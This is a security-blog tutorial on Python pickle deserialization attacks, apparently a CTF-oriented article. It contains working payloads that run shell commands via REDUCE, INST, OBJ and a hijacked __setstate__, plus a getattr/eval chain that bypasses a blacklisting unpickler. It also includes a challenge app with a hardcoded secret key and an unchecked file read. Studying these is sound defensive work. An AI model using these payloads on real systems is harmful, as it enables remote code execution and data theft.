First published in

网安之路

Studying Serialization and Deserialization Security Issues (Part 2): Python

Eki

A Dreamer of Dreams

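Python ships with the pickle library for serializing and deserializing objects. Unlike the languages covered in the earlier articles, pickle is built on a stack machine and can be regarded as a small language in its own right. Handwritten opcodes can execute Python code, overwrite variables, and more, so what pickle can parse is a superset of what it can generate: opcodes written by hand are more flexible than the output of pickle serialization, and some byte streams can never be produced by serializing an object. This opens the door to more varied attack techniques.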

0x01 Pickle

Introduction to Pickle

Python provides the pickle library for serializing and deserializing data, and the pickletools module makes it easy to debug pickle-serialized data.

A simple example:

class Student():
    def __init__(self) -> None:
        self.name = 'Eki'
        self.grade = "2021"
    def __repr__(self) -> str:
        return f'Type:{type(self)} name:{self.name} grade:{self.grade}'

import pickle
import pickletools

raw = pickle.dumps(Student(),protocol=3)

raw = pickletools.optimize(raw)

print(raw)
'''
b'\x80\x03c__main__\nStudent\n)\x81}(X\x04\x00\x00\x00nameX\x03\x00\x00\x00EkiX\x05\x00\x00\x00gradeX\x04\x00\x00\x002021ub.'
'''

pickletools.dis(raw)

'''
    0: \x80 PROTO      3
    2: c    GLOBAL     '__main__ Student'
   20: )    EMPTY_TUPLE
   21: \x81 NEWOBJ
   22: }    EMPTY_DICT
   23: (    MARK
   24: X        BINUNICODE 'name'
   33: X        BINUNICODE 'Eki'
   41: X        BINUNICODE 'grade'
   51: X        BINUNICODE '2021'
   60: u        SETITEMS   (MARK at 23)
   61: b    BUILD
   62: .    STOP
highest protocol among opcodes = 2
'''

res = pickle.loads(raw)

print(res)

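As we can see, pickle serializes and deserializes objects through a series of instructions (opcodes). There are several pickle protocol versions, which can be selected with pickle.dumps(obj, protocol=x). pickletools.dis helps in understanding the generated pickle byte stream by showing what each instruction does. For example, the 3 following the initial \x80 indicates the pickle protocol version.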
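To make the effect of the protocol version concrete, here is a minimal sketch that lists the opcode names of the same object serialized with protocol 0 and protocol 3. The helper name opcode_names is made up for this illustration; it relies only on pickletools.genops from the standard library.

```python
import pickle
import pickletools


def opcode_names(data: bytes) -> list:
    """Return the opcode names found in a pickle stream, in order."""
    return [op.name for op, arg, pos in pickletools.genops(data)]


value = {"name": "Eki"}

# Protocol 0 is the original text-based format; protocol 3 is binary.
text_stream = pickle.dumps(value, protocol=0)
binary_stream = pickle.dumps(value, protocol=3)

print(opcode_names(text_stream))
print(opcode_names(binary_stream))

# Both streams decode to the same object even though the opcodes differ.
assert pickle.loads(text_stream) == pickle.loads(binary_stream) == value
```

Only the protocol 3 stream begins with a PROTO opcode; a protocol 0 stream has no version header at all, which is why the handwritten text payloads later in this article can omit it.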

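To support custom reconstruction, pickle provides the hook method __reduce__. Once __reduce__ is defined, it is called whenever the object is pickled. It returns either a string naming a global, which Python looks up and pickles, or a tuple. The tuple has two to five elements (Python 3.8 added an optional sixth): a callable that is invoked to rebuild the object; a tuple of arguments for that callable; the state passed to __setstate__ (optional); an iterator yielding the list items to be pickled (optional); and an iterator yielding the dict items to be pickled (optional).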


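import os
import pickle
import pickletools
from typing import Any, Tuple, Union

cmd = "id"  # command embedded in the pickle

class Evil():
    def __init__(self) -> None:
        self.whatever = "whatever"
    def __reduce__(self) -> Union[str, Tuple[Any, ...]]:
        # Tell pickle to rebuild this object by calling os.system(cmd)
        return os.system,(cmd,)

# Only serialize and disassemble here; loading the stream would run the command
raw = pickletools.optimize(pickle.dumps(Evil(), protocol=3))
print(raw)
pickletools.dis(raw)

'''
b'\x80\x03cposix\nsystem\nX\x02\x00\x00\x00id\x85R.'
    0: \x80 PROTO      3
    2: c    GLOBAL     'posix system'
   16: X    BINUNICODE 'id'
   23: \x85 TUPLE1
   24: R    REDUCE
   25: .    STOP
'''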

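Once __reduce__ is overridden, the serialized data changes completely and no longer has anything to do with the Evil class. The R opcode is closely tied to object.__reduce__(): it pops an argument tuple from the top of the stack and the callable beneath it (the arguments must be a tuple), calls the callable, and pushes the result. R is exactly the counterpart of object.__reduce__(): the return value of __reduce__() is what R operates on, and whenever an object that defines this method is pickled, the resulting byte stream contains R.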

In other words, loading this stream is equivalent to calling posix.system with the argument tuple ('id',).
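The same mechanism can be observed safely by pointing __reduce__ at a harmless callable. The sketch below is an illustration only: the class name Innocent and the choice of operator.add are assumptions made for the demo, standing in for Evil and os.system.

```python
import operator
import pickle


class Innocent:
    """Hypothetical class whose __reduce__ points at an unrelated callable."""

    def __reduce__(self):
        # (callable, args): the unpickler will evaluate operator.add(40, 2).
        return operator.add, (40, 2)


stream = pickle.dumps(Innocent(), protocol=3)
result = pickle.loads(stream)

print(result)        # the return value of operator.add, not an Innocent instance
print(type(result))
```

The loaded value is whatever the callable returns, and the class name never appears in the byte stream, which is why the receiver cannot tell what a pickle will do by looking at the type it claims to carry.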

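Now for a classic example: overwriting a global variable through pickle deserialization.

The obvious approach mirrors the one above: run exec during unpickling to overwrite the variable.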

import pickle

key = b'eki'
class A(object):
    def __reduce__(self):
        return (exec,("key=b'jacey'",))

a = A()
pickle_a = pickle.dumps(a)
print(pickle_a)
pickle.loads(pickle_a)
print(key)

But what if the challenge forbids REDUCE outright, for example by filtering the byte R?

import pickle
import base64
import pickletools


class Student():
    def __init__(self,name:str,grade:str) -> None:
        self.name = name
        self.grade = grade
    def __eq__(self, o: object) -> bool:
        return type(o) is Student and \
            self.name == o.name and \
            self.grade == o.grade

import secret
# secret.py is a local module with the following contents:
'''
name = "Jacey"
grade = "2019"
'''

def check(data:bytes)->str:
    if b'R' in data:
        return 'no reduce!'
    x = pickle.loads(data)
    print(secret.name,secret.grade)
    if(x != Student(secret.name,secret.grade)):
        return  'Not equal'
    return 'well done!'


payload =b"""\x80\x03
c
__main__\n
secret\n
}
(
Vname\n
Veki\n
Vgrade\n
V2019\n
u
b
0
c
__main__\n
Student\n
)
\x81
}
(
Vname\n
Veki\n
Vgrade\n
V2019\n
u
b
.
""".replace(b"\n\n",b"^^").replace(b"\n",b"").replace(b"^^",b"\n")

pickletools.dis(payload)


print(check(payload))

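In this case, the c opcode with __main__ and secret brings in the secret module. A dict with the contents {'name': 'eki', 'grade': '2019'} is then pushed onto the stack and the BUILD instruction is executed, which overwrites __main__.secret.name and __main__.secret.grade. At this point secret.name and secret.grade have been changed to the values we chose, so the Student object built by the rest of the payload passes the equality check.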
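The overwrite step can be reproduced in isolation. The following sketch is not the challenge code: demo_app and demo_secret are hypothetical module names registered by hand so the example does not depend on how the script is launched, and only the name attribute is changed.

```python
import pickle
import sys
import types

# Hypothetical stand-ins for the challenge's modules, registered under made-up
# names so the example does not depend on how the script is launched.
demo_secret = types.ModuleType("demo_secret")
demo_secret.name = "Jacey"
demo_secret.grade = "2019"

demo_app = types.ModuleType("demo_app")
demo_app.secret = demo_secret
sys.modules["demo_app"] = demo_app

payload = (
    b"cdemo_app\nsecret\n"   # GLOBAL: push demo_app.secret (a module object)
    b"}("                    # EMPTY_DICT, MARK
    b"Vname\nVeki\n"         # key 'name', value 'eki'
    b"u"                     # SETITEMS: fill the dict
    b"b"                     # BUILD: merge the dict into the module's __dict__
    b"."                     # STOP
)

assert b"R" not in payload   # a naive filter on the byte R does not trigger
pickle.loads(payload)
print(demo_secret.name, demo_secret.grade)
```

After loading, demo_secret.name holds the attacker-chosen value while grade is untouched, all without a single REDUCE opcode in the stream.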

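Going one step further: if R is filtered, can we still achieve command execution? Consider how the pure-Python unpickler implements BUILD: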

class _Unpickler:
    def load_build(self):
        stack = self.stack
        state = stack.pop()
        inst = stack[-1]
        setstate = getattr(inst, "__setstate__", None)  # look up __setstate__ on inst; if it exists, it is called below
        if setstate is not None:
            setstate(state)
            return
        slotstate = None
        if isinstance(state, tuple) and len(state) == 2:
            state, slotstate = state
        if state:
            inst_dict = inst.__dict__
            intern = sys.intern
            for k, v in state.items():
                if type(k) is str:
                    inst_dict[intern(k)] = v
                else:
                    inst_dict[k] = v
        if slotstate:
            for k, v in slotstate.items():
                setattr(inst, k, v)
    dispatch[BUILD[0]] = load_build

This leads to the following payload:

import pickle
import pickletools

class Student():
    def __init__(self) -> None:
        self.name = 'Eki'
        self.grade = "2021"
    def __repr__(self) -> str:
        return f'Type:{type(self)} name:{self.name} grade:{self.grade}'

payload = b"""\x80\x03
c
__main__\n
Student\n
)
\x81
}
(
V__setstate__\n
c
os\n
system\n
u
b
Vls /\n
b
.""".replace(b"\n\n",b"^^").replace(b"\n",b"").replace(b"^^",b"\n")

pickletools.dis(payload)

res = pickle.loads(payload)

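The first BUILD plants os.system as the __setstate__ attribute of inst, and the second BUILD then calls it with the string on the stack. So by setting __setstate__ on inst we can also achieve RCE.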
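For experimenting without running a shell command, the same two-BUILD sequence can be pointed at a harmless recorder. This is a sketch under assumptions: the module name demo_setstate and the record callable are invented for the demo, and record (a list's append method) takes the place of os.system.

```python
import pickle
import sys
import types

calls = []  # records every argument the hijacked __setstate__ receives


class Student:
    pass


# Hypothetical module so that GLOBAL can resolve both names by import path.
demo = types.ModuleType("demo_setstate")
demo.Student = Student
demo.record = calls.append      # harmless stand-in for os.system
sys.modules["demo_setstate"] = demo

payload = (
    b"cdemo_setstate\nStudent\n"   # GLOBAL: push the class
    b")\x81"                       # EMPTY_TUPLE, NEWOBJ: Student.__new__(Student)
    b"}(V__setstate__\n"           # EMPTY_DICT, MARK, key '__setstate__'
    b"cdemo_setstate\nrecord\n"    # value: the callable to plant
    b"u"                           # SETITEMS
    b"b"                           # 1st BUILD: no __setstate__ yet, so update __dict__
    b"Vls /\n"                     # push the future argument
    b"b"                           # 2nd BUILD: calls the planted __setstate__('ls /')
    b"."
)

obj = pickle.loads(payload)
print(calls)
```

The recorder receives the string 'ls /' exactly once, confirming that the second BUILD is an arbitrary single-argument function call.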

Tools for debugging opcodes

Besides writing pickle opcodes entirely by hand, we can also get help from tools, for example:

PickleBuilder: a helper for handwriting pickle opcodes

Example:

import pickle
from PickleBuilder import PickleBuilder

p = PickleBuilder()

p.push_mark()
p.push_str("echo eki")
p.load_inst("os","system")

print(pickle.loads(p.compile()))

pker: generates the corresponding pickle by parsing Python-like code into an AST

Example:

class Student():
    def __init__(self) -> None:
        self.name = 'Eki'
        self.grade = "2019"
    def __repr__(self) -> str:
        return f'Type:{type(self)} name:{self.name} grade:{self.grade}'

payload = """student = OBJ(GLOBAL('__main__', 'Student'))
student.name = 'Eki'
student.grade = '2022'
return student
"""

from pickle import loads
from pker import cons

#print(cons(payload))

print(loads(cons(payload)))

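RCE revisited

Analyzing the opcodes shows that three of them are related to function execution: R, i and o. Together with the RCE caused by overwriting __setstate__ described earlier, this gives four directions for building a payload: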

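  1. R: [callable] [tuple] R. Calls a callable object with the argument tuple.
b'''cos
system
(S'whoami'
tR.'''
  2. i: i[module]\n[callable]\n. Roughly a combination of c and o: it first fetches a global function, then finds the previous MARK on the stack, packs the data in between into a tuple, and calls the global function with that tuple as arguments (or instantiates an object).
b'''(S'whoami'
ios
system
.'''
  3. o: MARK [callable] [args...] o. Same as INST, except that the callable is taken from the stack with stack.pop instead of being read with readline.
b'''(cos
system
S'whoami'
o.'''
  4. b: according to the Unpickler code, during load_build, that is, while the b opcode is executing, a custom __setstate__ is called if one exists:
     def load_build(self):
         stack = self.stack
         state = stack.pop()
         inst = stack[-1]
         setstate = getattr(inst, "__setstate__", None)  # look up __setstate__ on inst; if it exists, it is called below
         if setstate is not None:
             setstate(state)
             return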

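So arbitrary function execution is possible by planting a __setstate__ attribute. This approach does, however, require a usable class to instantiate.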

\x80\x03c__main__
Student
)\x81}(
V__setstate__
cos
system
ubVls /
b.
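The three call opcodes can be compared side by side with a harmless target. In this sketch builtins.len is an assumed stand-in for os.system, so each stream simply computes the length of the string 'whoami' instead of running it.

```python
import pickle

# Each stream ends up calling builtins.len('whoami'); len stands in for os.system.
via_reduce = b"cbuiltins\nlen\n(S'whoami'\ntR."
via_inst = b"(S'whoami'\nibuiltins\nlen\n."
via_obj = b"(cbuiltins\nlen\nS'whoami'\no."

results = {
    "R": pickle.loads(via_reduce),
    "i": pickle.loads(via_inst),
    "o": pickle.loads(via_obj),
}
print(results)
```

All three streams return 6, and only the first one contains the byte R, which shows why a filter on R alone does not prevent function calls.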

Mitigations and bypasses

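The first, blunt approach is to ban every opcode that can lead to RCE, namely the i, o, R and b mentioned above. But b clearly cannot be banned, because ordinary deserialization needs it, and banning i, o and R also rejects a large number of legitimate pickles.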
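The collateral damage is easy to see by comparing a byte-level filter with an opcode-level inspection. The sketch below uses pickletools.genops to parse the stream; the function names and the CALL_OPCODES set are assumptions made for this illustration, and parsing opcodes this way is a diagnostic aid rather than a security boundary.

```python
import pickle
import pickletools
import random

CALL_OPCODES = {"REDUCE", "INST", "OBJ", "BUILD"}  # R, i, o, b


def naive_has_reduce(data: bytes) -> bool:
    """Byte-level check of the kind used in the challenges above."""
    return b"R" in data


def call_opcodes_used(data: bytes) -> set:
    """Parse the stream and report which call-capable opcodes it contains."""
    return {op.name for op, arg, pos in pickletools.genops(data)} & CALL_OPCODES


# A plain string: the byte R appears only inside the text, not as an opcode.
harmless = pickle.dumps("Rome", protocol=3)
print(naive_has_reduce(harmless), call_opcodes_used(harmless))

# A perfectly ordinary standard-library object that needs both R and b.
legit = pickle.dumps(random.Random(0), protocol=3)
print(call_opcodes_used(legit))
```

The byte filter rejects the harmless string, while the legitimate random.Random pickle genuinely depends on REDUCE and BUILD, so neither filtering strategy separates safe input from hostile input.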

The second mitigation is to override pickle's find_class to restrict which modules can be referenced.

For example:

import builtins
import io
import pickle

class RestrictedUnpickler(pickle.Unpickler):
    blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit', 'map'}
    def find_class(self, module, name):
        # Only builtins are allowed, minus the blacklisted names
        if module == "builtins" and name not in self.blacklist:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))
def loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()

However, this restriction is easily bypassed with getattr, which is not on the blacklist:

from pker import cons
payload = """getattr = GLOBAL('builtins', 'getattr')
dict = GLOBAL('builtins', 'dict')
dict_get = getattr(dict, 'get')
globals = GLOBAL('builtins', 'globals')
builtins = globals()
__builtins__ = dict_get(builtins, '__builtins__')
eval = getattr(__builtins__, 'eval')
eval('__import__("os").system("whoami")')
return
"""

payload = cons(payload)
loads(payload)

This is equivalent to:

builtins.dict.get(builtins.globals(),'__builtins__').eval('__import__("os").system("whoami")')

That is, the allowed builtins are used to obtain a fresh reference to builtins, which bypasses the restriction.
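A blacklist fails here because getattr and globals remain reachable. A stricter variant is an allowlist, along the lines of the "Restricting Globals" example in the pickle documentation. The sketch below is a hedged illustration, not a complete defence: the class name AllowlistUnpickler, the helper safe_loads and the exact contents of SAFE_BUILTINS are choices made for this example.

```python
import builtins
import io
import pickle

# Assumed allowlist, borrowed from the "Restricting Globals" example in the pickle docs.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class AllowlistUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Only names that are explicitly listed can be resolved.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))


def safe_loads(data: bytes):
    return AllowlistUnpickler(io.BytesIO(data)).load()


print(safe_loads(pickle.dumps([1, 2, range(15)])))

# First step of the getattr chain above: resolving builtins.getattr.
try:
    safe_loads(b"cbuiltins\ngetattr\n.")
    blocked = False
except pickle.UnpicklingError as exc:
    blocked = True
    print(exc)
```

With an allowlist the chain is stopped at its first GLOBAL, because getattr was never listed. The safety of this approach still depends entirely on every allowed name being harmless to call with attacker-chosen arguments.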

Example challenge

巅峰极客 2021 online round: opcode

from flask import Flask
from flask import request
from flask import render_template
from flask import session
import base64
import pickle
import io
import builtins

class Student():
    def __init__(self) -> None:
        self.name = 'Eki'
        self.grade = "2019"
    def __repr__(self) -> str:
        return f'Type:{type(self)} name:{self.name} grade:{self.grade}'

class RestrictedUnpickler(pickle.Unpickler):
    blacklist = {'eval', 'exec', 'execfile', 'compile', 'open', 'input', '__import__', 'exit', 'map'}
    def find_class(self, module, name):
        if module == "builtins" and name not in self.blacklist:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("global '%s.%s' is forbidden" % (module, name))

def loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


app = Flask(__name__)

app.config['SECRET_KEY'] = "y0u-wi11_neuer_kn0vv-!@#se%32"

@app.route('/admin', methods = ["POST","GET"])
def admin():
    if('{}'.format(session['username'])!= 'admin' and str(session['username'] , encoding = "utf-8")!= 'admin'):
        return "not admin"
    try:
        data = base64.b64decode(session['data'])
        if "R" in data.decode():
            return "nonono"
        loads(data)
    except Exception as e:
        print(e)
    return "success"

@app.route('/login', methods = ["GET","POST"])
def login():
    username = request.form.get('username')
    password = request.form.get('password')
    imagePath = request.form.get('imagePath')
    session['username'] = username + password
    session['data'] = base64.b64encode(pickle.dumps('hello' + username, protocol=0))
    try:
        f = open(imagePath,'rb').read()
    except Exception as e:
        f = open('static/image/error.png','rb').read()
    imageBase64 = base64.b64encode(f)
    return render_template("login.html", username = username, password = password, data = bytes.decode(imageBase64))

@app.route('/', methods = ["GET","POST"])
def index():
    return render_template("index.html")
if __name__ == '__main__':
    app.run(host='0.0.0.0', port='8888')

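It is worth noting that besides pickle.load, other Python modules can also trigger pickle deserialization vulnerabilities.

For example, numpy.load() first tries to load the file in NumPy's own data format; if that fails, it tries to load it as a pickle, which triggers pickle deserialization. (Since NumPy 1.16.3 this fallback only happens when allow_pickle=True is passed.)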

0x02 PyYAML

https://github.com/bit4woo/code2sec.com/blob/master/Python%20PyYAML%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%AE%9E%E9%AA%8C%E5%92%8Cpayload%E6%9E%84%E9%80%A0.md

PyYAML https://xz.aliyun.com/t/7923

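0xFF References

Official pickle documentation https://docs.python.org/zh-cn/3/library/pickle.html

Python deserialization attacks from scratch: how pickle works & RCE techniques without reduce https://zhuanlan.zhihu.com/p/89132768

A first look at pickle deserialization https://xz.aliyun.com/t/7436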

Published 2021-10-04 12:50:55